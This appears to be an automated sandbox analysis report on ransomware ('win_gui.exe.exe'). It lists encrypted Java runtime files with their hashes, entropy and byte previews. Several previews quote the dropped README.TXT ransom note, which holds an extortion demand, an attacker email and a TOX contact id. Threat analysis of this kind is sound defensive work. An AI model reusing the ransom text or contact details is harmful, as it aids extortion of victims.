                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files (x86)\Java\jre-1.8\lib\images\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files (x86)\Java\jre-1.8\lib\javafx.properties

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):664
                                Entropy (8bit):7.631467939639301
                                Encrypted:false
                                SSDEEP:12:xuVbsYCWw14eNR1PcrSOGJ9fuyAWKj0hOJNuauDZMK5mg/2lWOZOs9NXzku:xqbz/wpDyYPGTNj0hOHAVMJg6WXs9R
                                MD5:AFB7F2A0A80F3EDC66547A5A75404FE2
                                SHA1:05C80EA77275446A9AD195F676F6196C88ECDE15
                                SHA-256:D71451C54269270450E50049FBF4EF612A3386721AC98FE9FC5BAC975FC8EF1B
                                SHA-512:63676FC458BEFC7B79871777DA3C676E78DA1CBA9B3C0A9DBD9FD9F25E3B0480F32CB93FA8A0903FCFE854E4BD4828C5D15B92A55721C0A0AD80FFD277ABFC88
                                Malicious:false
                                Preview:"...|.....31..`.K*.2.He..."x..../e....R.T...[V.B.D=.le...}V.../...JKE.Kq}.P}.5....J-=j.....p.;o-..H.._V...[..8.#.e..4dW`.W.9D=.=&..A....^D.6...AF..\..8...%..AT.S]...}[Q..-.XC<..c.:U.....UQ..*R...A..,.M7A.!..i#...A~.....].*_.`.Q.?....F..m..}.....PT....<e.M.o#.....Z/.....eU.zf.'._..W[c6....L..........j..\h0....Cl^.....)........J....`"./.5..H....?.d.5.......# ......./.G...X.Z^...l....R...(...i......N.".y..@..;........&..a...^.*....1%n.Ub\P|.@.EI..Q.vZ....)q.kW<....2....|=^UlF.......YA.t....Y.!<../....(.>.*.U...pCW....7eEa._.....Bl^.EU..:I...._.&.P.`.I.h.d.2>Z..!...N...;.`..k.....B...iZ......q.9}.."8...................fk.W...f

                                C:\Program Files (x86)\Java\jre-1.8\lib\javaws.jar

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):957531
                                Entropy (8bit):6.9462170581160505
                                Encrypted:false
                                SSDEEP:12288:OCdYnv+0yKb9a2LtVoiYEN5eNS3rjZpNlBsZACAaiYtJ+KQ:OCdYnvnhtVojENUNYJRqKNVYjQ
                                MD5:7FBB29A6FD4C0C2B315095ED890BF113
                                SHA1:9EF79E9A8E5AD34FFF724326A398D8A987F29832
                                SHA-256:B2C3A2E0B94F6245FBA061156377D2D182A52644C783F97275354F4AA8794097
                                SHA-512:90E23588E84647CFEFE8A137F1B15E8C83F471B53A3C487A1E3B60C590FB1DF6931DCAA653A86113006CF4040008B3956CF1FEE1DAEB4C5B3E0082637DB56C7A
                                Malicious:false
                                Preview:.....9."rS......o..+.@3M.........5......T..rHLC...^.j...9...o*=.......3....^.,.r..qK. y.?.*-.....T..8.w......Z.sE.D..hb.Sp....t-^65.....\...f...# ........G....M.>..a!v$.A.&;..#...L?B.Xn.qw.bZ..u.8.#......}\...h..}~2.}e.5Ad]....=A}B..-.....a..=.Q........PWW...2>..9...x.W.W...v.x!.V-......-.Mn.....h.........Gm..hT..Av...1.F.k..L..V...Q.....".*.).....>;*..\.........;.(.N.).d[...._....z.....a.<X...i...i..b....1>*qT.K<..u....A....3....<...y>).....1.D....MP......4.R^...gO..H..xk.cu.aD..<.}M+gY'..Q....M7.l...K...A.tA..YY...7.. .:^....X....^a.s.]D....-./'..~...pKOR..o..P%.S`.A....N?.@Z..V..|E.a......\.%...+W.3./....4.L.a...,...E{M..<.QF|A.S.......[.B!=j.!?.tF....f....l....n..\u..p......eu4.8...<..6.yJ0....A...r.(c..iG....H.G..5..........@(.A%|....Q?...z...g.VWQz..5.....0..Cs..M-.#.n.....c.c....U..Q.[.(...S%x.e.,.....e..P.SC..U0T..mL..<.l.(.b1N...O.W....o|VR...w..../..G..z...u.|..k.......W........][...0.\f......C$y.U.L.F).$'(.2..o.|...QG...8s...

                                C:\Program Files (x86)\Java\jre-1.8\lib\jce.jar

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):123332
                                Entropy (8bit):7.998743784494614
                                Encrypted:true
                                SSDEEP:3072:Rh30YPzWp+n0xUC6H2rxRZEBE/yykOze1b7D5bI4YB6:fkYbWplUVWrxR4ckOzIU6
                                MD5:36973C84B92D480218179D65882EB4E7
                                SHA1:FC1EC1CCE74F225C2BAB4222DB67807E17396E47
                                SHA-256:4B4AD29B53A483D89F8DED8FAC2A3D9074C73AE005C634D601175729007E9958
                                SHA-512:041908DE1C2139F3DBA33BB77E52494AA778B6C1C6F02A2871E5C58B98DEC429FCA76D9616D2370E4A9320A89633CB13A9FB83B0654C5EF935939E2852CC979E
                                Malicious:true
                                Preview:6.....noL..c.....].%...\.WR....g.F5Jg....T_...HE@..Q..J..Cjl..6mu.?...F6.#..P~.t.... ...^..V....YK*.u.A?Z.<.m..;..I....2....mi"=x_..l......<.JB.#....)wV.G'DG.P..&.M.....9............iW\-)[..E5Cna#o.%..~.....SF.*,L....s1uWi7....y.Z.....s......U.pBF.>..+.C....=.o......G..m..0.Zw,. ...A..{G....u@...f...<<..q..j.;...U[..............3U...%.#.o..(!W..g.P.`j...C.gj.....e6...T....=...-mc[....n.....+..u9.......ZD.m..E.:.e&CO.^..$........y...?..5.....d..!......7.O..|..,..L..J.a.....1^`dlX..X...M. .U>|=e.N....$....'..>......2_...I...2*............_}.../.=5E.M...a....q8.Og..[.t.......UI..S.F!<.......[Z..`.w.....w...@1.X.&q...E.7.~..y]A.i...\..`V...8.^.xhD..0.,I..3...=u.).5..=r.!.....L.A....C...M1....Hj:.......U\!..a.R.@...u^v.W~.....*..?..5..j.~..an........z.t.f9E.3...1...k.T.4j.%..t..t.._R.3H.ra5.sI.z.i ......B..B{A......m....Zq....5.-b....-......g.....Tf.[....W.0....8./...n..,..0...q...T..n.xB^U.F..=.JB.t3X..}...b.L.....m...:.RC.fF.U..AX..

                                C:\Program Files (x86)\Java\jre-1.8\lib\jfr.jar

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):574879
                                Entropy (8bit):7.4128984671385965
                                Encrypted:false
                                SSDEEP:12288:cYPid0Ya9+zrfx5l+qU67FYWg+YWgYWeoXqgYSqYQh2f/m5NwaHkSIJHvWQ6Q7o9:cYqdza9Krfx5l+qU67FYWg+YWgYWeoXw
                                MD5:59B870ABDE86B6D7561CFE135185A400
                                SHA1:22694627B5F29A75F5A54684EF11833CF7AC9479
                                SHA-256:E69A23BB3F50355B5446E6DA0E2CC272D24D91CEC1384C8265C2DBACB6FD0867
                                SHA-512:A286BB19A7B69EE2A98B1415079E11275FFC3E710DCA9F9561156CA40BF73B1C4366F306CE32535D3005214943A0BFF9870F272648F53B04AB253CD82B0F18A2
                                Malicious:false
                                Preview:...........Z,c.".f....Id...."..P....>5...+..^.j...^Ww..I..V.}8..".B.....JKS-.m.`....1us..Vr.........ES..D.B".&n.l.../.8...Y..e.&..)..X0.....>e.."~.us......yF...:tWv0/P.%Au..\.Rga... ..5.2^.Td........F*....{cJ....}..n.0..8..r...L.X....L....\TG.qL...L.o.>...5.'.`.2...g...9D:..V.2n...J.]C.K..b.}..G..<I.........'......[...W$...#.`.....j..$...(..$.....5....f.{OT....O...EM...H.oI?|2f.t1>n...euN.&..y...{_.|.7..<....6...L...4".g~.l.ia.LB....\_P).).,'.o.dp}...W.6..x[.Z;.S.&.7S...i..6}.M..f..!....u...g.G....R..l..p``.A ..i....A..L.Vg..jhfr.5.G...j.3.EcX..|.f...t.T].r...:.sq..B......8....Bo}...)..]$.WX..*.._{....(...8......lq..D.S[.....}..........H..Gh......G.-..Oygq.RcT......Wp}Uh..P./I.^..4q.3QU...H.......<.... .6t.2.7.M#F.....:4.>.x],C...].T...u..J.....b.N..Z./...G.'.D.+..k.../."..-_.L.......?Z..#})..{X].o#.@.L.Z.A.5..'D...VG....d.....x5.8..<\..>.e...'....C..m...[.....E".|VD.....a.....1.v.E...$7zUS.w.tC..&X...*.xM..8..[.@p._P...n!.2..9v.."..

                                C:\Program Files (x86)\Java\jre-1.8\lib\jfr\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files (x86)\Java\jre-1.8\lib\jfxswt.jar

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):34526
                                Entropy (8bit):7.9945329385042125
                                Encrypted:true
                                SSDEEP:768:RBTqjwOEDasOaNYmm1MWjlzBIHFKdexPAmpqpC51Hv:R2qGHcYeWjZ3gxkYP
                                MD5:EFAD53837D78671D0F5A0172242812BF
                                SHA1:2A9EE651E913F77FB167C58394050F38DF228AEB
                                SHA-256:E38331B04D6D9B26C54145507AB3D71815FD4D8A244BB7F2FD2F622328F8AB3D
                                SHA-512:D6409AD7E4F461652177CE5D5C2BA6EC43E7EC0AB8731B5A5FF20F3760649467B6E455ADDC085A43CD10C9F9CBC03C4593495081B03536135076310DD48704DA
                                Malicious:true
                                Preview:Z%.@..im%.[.?s...BO[e.......=...XZ.a......+..l-..28X/O.../ZQC.8.e...........uC...V<..E.Ab>.t.t..o8@..+..q..X.:hL'..........\..=/....I.=nnn........L.H.....j.U..l..fY..0.....M..<. .BU..0.......GV....W.c.c.7\.J...7....)`. .~..bQ;f.U..&.../7*.-l.=.V..TF.l...M.MI.MN ...].T.g...D.i|.E?._........G.:..._/.(..........[.......Z$......i..?...V.....P.....7...3....\l:Y./.....V..s0_S.b.0D..W.a..]..N.+.J%..L.As..i.|.[....S.R.....Q(..........}.8.Vc.zp...dl[b..5....'....j..i.a?.H.f.?q.y(\...J_t.)4....f....-..%e..........S.....Il.|'Y.g....%..6<.48.r.B@..dW.....9.^|..'&l...........6......Z.s#h...q.......Z.DL.l?C....e.`N...h.......L...u;.O....S..J...D..;........E0..._.Cs5.%2..t..f&..r.y.1.1.X.....0..ru$.....;m...9.W.,|..R..n9.pnk'..G..q.?......=E.u.n.p"./)V.r..t.Z.xX4..../..Zy...6...K..f.....&....jw....nt....,g./.!.Wp.H..GN...w.L..Yl..3......de6.q...2...pq...*I.E..56.#I..d......ZI..U...y%P`.#.6.N..p....u.9S....l..j....;c..?..v....X#.....u

                                C:\Program Files (x86)\Java\jre-1.8\lib\jsse.jar

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1790929
                                Entropy (8bit):6.8459507684295735
                                Encrypted:false
                                SSDEEP:12288:KVy4Mo70l8djm0Ru1G7Yc/oUu4BrOp66Xe2bmfi4yRPwkC3Dc0nNXHA5LyIhIhJ:KVy7o7/tR4G77u49OpTnbUeJCAsCy2I3
                                MD5:07299C9F08C41BC09DAE4C8D6D5B544E
                                SHA1:869501374AEC16076FEF5E4D0B711A69E8EEA973
                                SHA-256:41CA171AFEB6FDFCFDBD4667753A34C96C52DAE0AF0E0E6C62A3E8EF5ED2BFB1
                                SHA-512:8BFA66C84A2C1F35106540EABD9436997ECCB1F21018ED2E858C5DEF6BA4646A0A29097C9405AA97A44A2AC27ECD19744AFE8B34AA24F3F81F0C45BA1E72F944
                                Malicious:false
                                Preview:RX;.aD.=.W~...w.J.'...Pn.a0.<Z"?,..K...bX...1!...e....o....".\..#4.(k.....=.7#..AC.,.}..QPj.^N2P...#m_..6H..J[..%.#...h.X.0.$Z..........2U..".,..0......1Y/.6.m.0......?..5*~C......]..q}c.....V.t1..-...0*..t..E..~.-I.LB%....!..FE.R..km..U+bx(.m.Ft?Y..H....P#t'....z)VZ.F7...^.X$..=...V.U.&.....@..Vc...WKD.J~./..g.#.E..G..u(...#.....]n;..1...h..../9J.C...0.!..N.}....E!3 !L..z...q...>O...U.!g.....ps.o..... Fa:5....J%.!.l^..q&...~..Q.O.k....c...Q.........S. ...AnN w<.+5G.*.z.^.._.!..i.!....! .........3.YQN.7.<..+......)......5..D..|..@/x....6...:).6H.?.......b.cK.4.....;.aO.'a...5.~.3..V0..#..=.1>;.2.8..+.Y....................%.p....8.ds...7..n..RZgQ.......O.3Q..ED...............e...i..p>>.J..,.....T.."?.....7<...GF..\.......U.D..reN.QY._...8......W8ph...4jWD.7...u.x.)R..{....w....y.>.%g..].t.....:..$-..9z.-r|...c@.Mg\..\....u6)..:..ZZu.EA..P..........`6.........9.?.t... cP...B.s.Z...>0A.Q.....$.;..&..L*.vo..d.......`.w./;...X...xf..

                                C:\Program Files (x86)\Java\jre-1.8\lib\jvm.hprof.txt

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):4834
                                Entropy (8bit):7.954143588502139
                                Encrypted:false
                                SSDEEP:96:nz8F43Czajp58FwL9tooXgGW+GvNbkY5NMMeKGzCdGevuAVOvA:nwF4ZTSw4OgGYFjN7eFGw+VOvA
                                MD5:6F5C8EE85BA36B2FA04276EE73F8239D
                                SHA1:049D10085A86597C309F2FE4C762227D750DB5B3
                                SHA-256:B11DF0A06FD492A2ADA95902952351A71802522932BE736920BAF3D709D81768
                                SHA-512:3612CCF0F1923C24F907156577A7108D83CC27DD3DFC10CDCD2E17F0BD52D94CEDD4829C1E79B94009D02E3D563270E481AF43F02118D0BD227CE49ABCA4E797
                                Malicious:false
                                Preview:.Y..dV;.....l....I.T"f."{...2.8o....y7.....h...6..9Y....o&.....hi.J..<...J..*...c...E...1...x..[.hO.}.....$L..Z...5.._.(...o.u..S..{*9.q*....^.4H.u.2.....d.@..u........0....sC"3*{..X.&).....R.Ae#....n..gV...T....>..h..L.......<...}..C...A..*..E.....;R.0...2..<n|3..7.,.i......f;..q9.......J.)YE.Wd.D.b..".N4.^*@.....%q<....y....i....7..3.p..{t..%T.5..tQ;.Q..) .......8.Q.=..T...<Y.......l........v..nc.W...g.........TF.n.u.i.K[.yb... K2..Q{....5......1w..M.... @.-..2....$..W.}.{Y@...G.....:'.]B.......>.fy6/.3._F..]...I..c.x..3.S|..%.=..6VL,..".C...pK.&l.]...qZ.0.N..G... !&H.....O.)b...P...b.W......l.n....D.....0.f.1..%..q.].b.....@.....nau.|,>1h.17`..8.. /.......qG..r..!.zP9z......z..=pM....#..(.x..*...........C..r.P..E.e....mr.y.2%..u%:.'.......&\y...2w..jD..W.@.vLN.1..'...v......qH..e,M.!`#..B......KyK=^4.>1..y.i>.eU...A'.......F.:)..~....P...}.X...-P.^...S.?.i.......n.....\d@U.1..3.`v.C'9v,uH.B...aZ...7.4.I.}........c.LP.;..

                                C:\Program Files (x86)\Java\jre-1.8\lib\logging.properties

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):3063
                                Entropy (8bit):7.944445303369046
                                Encrypted:false
                                SSDEEP:48:etR9+jiI7We7rL7Q69t176qYd0jcYOb64Q51mbsSpdlK2+kv4/IhNqjAQHBlp/W4:q22IWoQ69tLwWcYOb6312sS/skvJ7qA0
                                MD5:90E7CC6A7F06415748913FCD34C3ACC7
                                SHA1:AC51565ED6160248DB34E443B7069EDAAFC15DA4
                                SHA-256:ED060DA27071FC964440C16A4B67489E496ACE3DED6E3B97D9FA4A27DCCB1681
                                SHA-512:7862524A77345891739F7D59969D3BFE5316FD6EEAF5F8600323B0F02CDF05CEC6CD089B5DA09712ADB6B492C008F8992E43D0222203A64411CB987E9193B33F
                                Malicious:false
                                Preview:S3.....%d......:,..$...YA.Pf...M>d.g....].7U8._D........R.E..e.......F....J.d.FM.{.....8.j....1.{b.r ..9W0P.%i.....{.....k..N1...M_}J ........'.............7..6,o.h.T...hC...Kk....-...^..MK7..;'W.o.sEY.3.]..RC..*..-....A.hz...~[...d...........U.....lY.)..;p.w!.o...bLv+.H>:...Eil.E..l]6.8....6.eAq*.(..I.G.*.0~<...B9.O..1..g...B..V......|X..'=.........v........8r..0....|wi...._l,...g.Z..4....4.B.@.;.>.r..........i.{6..9m..c.......36...R...,.r..6.....Y!...w3.... .@..1.hc..y..F!..Ji...p.l..f...sTq".;(...O6._..O.}_u.JK."F...........H..R`......J..Y.{:.5.O=.........d.~.9..P.OE..0..E.. ..(?c.2.|......7..S.h...Sny.[:..>P...~.....aHL..f...zU!..X.qpc..WN...}.Q.........A..jq.,{....e....&..>.._..?{<...ik.....Y.Q,/.O..Cb%J.h...^....N.{?C..p...q.....!.E."...N.v......]..q....c..x.3%5d.j.DGN'w4.[`....e...8..uS..u...7._i.G~BLY.'.JAv................F..N.RwP.X....s.4..["N...U.]..e}...l....i.............(..*.R..vI....#C....?.......j......C..

                                C:\Program Files (x86)\Java\jre-1.8\lib\management-agent.jar

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):990
                                Entropy (8bit):7.77280451964711
                                Encrypted:false
                                SSDEEP:24:1RqPIWc6DN/mHhgmz/wpDyYPGTNj0hOHAVMJg6WXs9foQ:OPIWREhgG/WyYu+MAVMJg6TR
                                MD5:C0331714E410237DAE63A4FF1B436053
                                SHA1:6DD35CFB2045FDEC94E07F56A99FC4E06A16AB3A
                                SHA-256:1FDD59359821EA5F1C6C367A4FF0F2C484B7681F5CC80080502EB4FFEBC93FFC
                                SHA-512:87E426CC50EB685E0CC2F74D484B52B69D3E0BBBDCC78344F89E8314FB692D1E2929A01597C99424BB11A35AC2732B3E00AA8E0594BAF7705CF218409487B8AC
                                Malicious:false
                                Preview:...,T...X......E.3.....H[.G.OK..\c#\.U`K...u...m..[O.il...4:...\:....G...,..-..-.b..~.BR........NGgY.....{b..+.%.....a.R.q...Ja.2..Yn.W.K........Q{V/.+...........H.4..ktAB.0{)|8..COUXPz.........l.....g..:.%[....h..y......9.n4<+S7.p..oH.*~.d......8-d...Q#.....M..B:..F.f.....G..{k+..)"....=.Us.......>...t...|...Bi.>.d.X.h...9.{..I..Y|.....jR".C.c....J...x.V.(&.P....}V.../...JKE.Kq}.P}.5....J-=j.....p.;o-..H.._V...[..8.#.e..4dW`.W.9D=.=&..A....^D.6...AF..\..8...%..AT.S]...}[Q..-.XC<..c.:U.....UQ..*R...A..,.M7A.!..i#...A~.....].*_.`.Q.?....F..m..}.....PT....<e.M.o#.....Z/.....eU.zf.'._..W[c6....L..........j..\h0....Cl^.....)........J....`"./.5..H....?.d.5.......# ......./.G...X.Z^...l....R...(...i......N.".y..@..;........&..a...^.*....1%n.Ub\P|.@.EI..Q.vZ....)q.kW<....2....|=^UlF.......YA.t....Y.!<../....(.>.*.U...pCW....7eEa._.....Bl^.EU..:I...._.&.P.`.I.h.d.2>Z..!...N.A..\TU....w.......X..-. ..P!.!d..u~...................fk.W...f

                                C:\Program Files (x86)\Java\jre-1.8\lib\management\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files (x86)\Java\jre-1.8\lib\meta-index

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):2734
                                Entropy (8bit):7.932272661252192
                                Encrypted:false
                                SSDEEP:48:QVxFqR9/a57HYPkSYN4tvfwg838HBoSaBqdevsaueEJvv70fMcYJ+t6y/WyYu+Mr:XR9C5rMjwehixEav4vv7OYJ+tdevuAVo
                                MD5:81005A9D5586940456AE2B8EB56D0B6E
                                SHA1:C58744D86B3A4146DB245A232606083C511DD5FC
                                SHA-256:7E9F1C1B1269961C95D72F46938BD0A25F8A633C01C42596335089BB6CA125B4
                                SHA-512:C8D179C366F2CF5FACE3847B8787763280786CE624EF6DEF4E884A89138FD8A1AEBEE68081C113D06F5D2D06233572725C4DE1C99D064774DD59763E8261F1D3
                                Malicious:false
                                Preview:.Q......E...t...|.R......8...P.....X..).`..Y..?Ch.....7..5..(.>&....x.-c^.*....D.U....vvk..).q.88Eq.u.%..z^....<..m{!h..c.........E....h.R...6hRv..%U.*q...Pd.'..U..x|.yK.sEB..d.Z. E..C.<....D...:......_Ci@^g........j.6.n=....H*8....|...gt .......y.H.."D.Vx..6W..~P.od.~.b]......B3.....K.....?b..nk..E....Z.!..El.-3.i.2.-......}.aa...W.MuL...8..yy8S..........G;S....vl".p.\o..& ../@8.Y).).......r....a..[........^.z...N...$...[o._..-Y..OW.i.P..b^.....z....e.]\1..=&..7.j.KT..=..'......S....c.3.MRVPw......$_.W..#..aK.....sPt.0~1z...I....f.~...y...".....}((."K.9t.+.s.+Q*u..>..2'.D.&.....7..........4..j..J.G....>...Y.....P.\jf.un.H.M.vQ.W....\14......7._..._%lw.F.q.y.iM.J.+!..R.M.y.&.uiw..C%...zv.i.v..`?5W...b...597.L./.fH......d.<!.o.mn..)..7$'...}lWW...y..^...W.T)u..o..U....V.Kp..N..2.s....\....s....0.U......q.`...F&.F.wJ...I..*..#......z...........m...7.5/.h|.L...V.S.lxE?s....\..o....p."...|.[..?bB..(sM\.,.....e.q`.$....

                                C:\Program Files (x86)\Java\jre-1.8\lib\net.properties

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):5960
                                Entropy (8bit):7.964383265374068
                                Encrypted:false
                                SSDEEP:96:1Kyk9J0+L8NMiAjT2YzSR7tLwtqL935FpLsyi6CvLiGpZH5eWeV5I9evuAVOl:1TklLYMtjTZzS/LwtW93Ty/67mZeo+VQ
                                MD5:8B427CE184C8DDB058E23A5549F26A7F
                                SHA1:2E668B1B446C6E4D8A6CDF7E53D158D0AD02679A
                                SHA-256:A44630A34767E7D704DCB654042B53D34E1A0B2CEAC9389E823D79B7158D9376
                                SHA-512:71D05D4DF2FBD3ABC5F073FAC378952E903405A4F84632A5DBE335A03A3E64A5AAB1C13FAA52BD32577ED1670FEA9E34FF1229432C826E9ED01B4C06C5CA0C0E
                                Malicious:false
                                Preview:.~..1.........j..di....Ag#Pp4.xg..6..i..>..5w.$. h..Wt...a.H..1...#.......[..w..j...x.....\......s7...............NwSWo"(^1g..?[&.4..+...<.ld..o=f...'..7....../........q$..l..4..I........C.L..M..~..\Z{..{...#....>..2+...7.@"...:...R.Q.>.T.N\..S.1.....3g...V.....(.jL]..."5'>..\.r~.&.e4.yg.*S....J....4.1N..f....R......~m....{.......|..o..n.q.#..k*...D.'..p..D.k.ah..&...q@.v.....&.(.....d.i $...9....QLR......R..+.T...u...f......a`....2..cZQWK.....H..i..F....=.Q...fs..{,L.H.5.......FL\.{..(...Tc6..GO...dv`srE...=...g..)Z.....ip..G.b.. .k..\.x$...U...7.VM&.s.K.{....|@...~..B|..cZ..3.lV....F..[.....-...1C..**%..:..#A.-.,....Dm........\.=....xV..KAUE.......\.;.....L.L...6....#.z.]..OI~A`...L.N..O..~;.RVA1."..Ak.N..]M.....E.!H.......l.....B.P.p.3d..E.]]....f..j..|..~.........Y.....v..m._.m..../3-@0. ..S.C..K....M........_..A6#.....e2.|..,ta@`.ts..}.!..7.A[G..a............r.R.g....."..r.....2k....b.xz..9.t]..4.;....n...;..;C....G...V..M.

                                C:\Program Files (x86)\Java\jre-1.8\lib\plugin.jar

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1925397
                                Entropy (8bit):6.886058879417841
                                Encrypted:false
                                SSDEEP:12288:6yKVNV4ajgNA8T33jVQSWUNZU4sVa7pm8gP+/G5jyvspP8+swnaCG:VKVP4GgNZP5PZQGm8lG5lSQaf
                                MD5:5FDE12316964103B34259CBAC940CE88
